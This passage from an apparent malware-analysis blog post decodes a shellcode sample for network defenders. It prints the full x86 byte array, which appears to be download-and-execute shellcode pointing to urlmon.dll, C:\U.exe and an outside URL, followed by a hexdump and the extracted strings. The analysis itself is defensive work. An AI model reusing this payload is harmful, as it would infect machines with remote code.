0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xEB,0x54,0x8B,0x75,0x3C,0x8B,0x74,0x35,0x78,0x03,0xF5,0x56,0x8B,0x76,0x20,0x03,0xF5,0x33,0xC9,0x49,0x41,0xAD,0x33,0xDB,0x36,0x0F,0xBE,0x14,0x28,0x38,0xF2,0x74,0x08,0xC1,0xCB,0x0D,0x03,0xDA,0x40,0xEB,0xEF,0x3B,0xDF,0x75,0xE7,0x5E,0x8B,0x5E,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5E,0x1C,0x03,0xDD,0x8B,0x04,0x8B,0x03,0xC5,0xC3,0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,0x64,0x6C,0x6C,0x00,0x43,0x3A,0x5C,0x55,0x2E,0x65,0x78,0x65,0x00,0x33,0xC0,0x64,0x03,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x40,0x3C,0x95,0xBF,0x8E,0x4E,0x0E,0xEC,0xE8,0x84,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x3C,0xFF,0xD0,0x95,0x50,0xBF,0x36,0x1A,0x2F,0x70,0xE8,0x6F,0xFF,0xFF,0xFF,0x8B,0x54,0x24,0xFC,0x8D,0x52,0xBA,0x33,0xDB,0x53,0x53,0x52,0xEB,0x24,0x53,0xFF,0xD0,0x5D,0xBF,0x98,0xFE,0x8A,0x0E,0xE8,0x53,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x62,0xFF,0xD0,0xBF,0x7E,0xD8,0xE2,0x73,0xE8,0x40,0xFF,0xFF,0xFF,0x52,0xFF,0xD0,0xE8,0xD7,0xFF,0xFF,0xFF,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x6D,0x70,0x33,0x2E,0x72,0x65,0x61,0x6C,0x69,0x7A,0x65,0x2E,0x68,0x6B,0x2F,0x6C,0x6F,0x67,0x69,0x6E,0x2F,0x69,0x6E,0x64,0x65,0x78,0x2E
Now, you can convert the hex strings to binary in any number of ways. Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):
xxd -r -ps /tmp/payload.hex | hexdump -Cv
The output should look like this:
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000010 90 90 90 90 eb 54 8b 75 3c 8b 74 35 78 03 f5 56 |.....T.u<.t5x..V|
00000020 8b 76 20 03 f5 33 c9 49 41 ad 33 db 36 0f be 14 |.v ..3.IA.3.6...|
00000030 28 38 f2 74 08 c1 cb 0d 03 da 40 eb ef 3b df 75 |(8.t......@..;.u|
00000040 e7 5e 8b 5e 24 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd |.^.^$..f..K.^...|
00000050 8b 04 8b 03 c5 c3 75 72 6c 6d 6f 6e 2e 64 6c 6c |......urlmon.dll|
00000060 00 43 3a 5c 55 2e 65 78 65 00 33 c0 64 03 40 30 |.C:\U.exe.3.d.@0|
00000070 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 |x..@..p...@....@|
00000080 34 8d 40 7c 8b 40 3c 95 bf 8e 4e 0e ec e8 84 ff |4.@|.@<...N.....|
00000090 ff ff 83 ec 04 83 2c 24 3c ff d0 95 50 bf 36 1a |......,$<...P.6.|
000000a0 2f 70 e8 6f ff ff ff 8b 54 24 fc 8d 52 ba 33 db |/p.o....T$..R.3.|
000000b0 53 53 52 eb 24 53 ff d0 5d bf 98 fe 8a 0e e8 53 |SSR.$S..]......S|
000000c0 ff ff ff 83 ec 04 83 2c 24 62 ff d0 bf 7e d8 e2 |.......,$b...~..|
000000d0 73 e8 40 ff ff ff 52 ff d0 e8 d7 ff ff ff 68 74 |s.@...R.......ht|
000000e0 74 70 3a 2f 2f 6d 70 33 2e 72 65 61 6c 69 7a 65 |tp://mp3.realize|
000000f0 2e 68 6b 2f 6c 6f 67 69 6e 2f 69 6e 64 65 78 2e |.hk/login/index.|
00000100
After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download:
- urlmon.dll
- C:\U.exe
- http[:]//mp3.realize.hk/login/index.php?reg=
IN CLOSING
When you can quickly produce these types of results to your network defenders, it goes a long way to detecting and preventing infections on your network.
Thanks for reading and hopefully you've found this post informative. If there are topics you would like to see in the future, please drop us a line.
No comments:
Post a Comment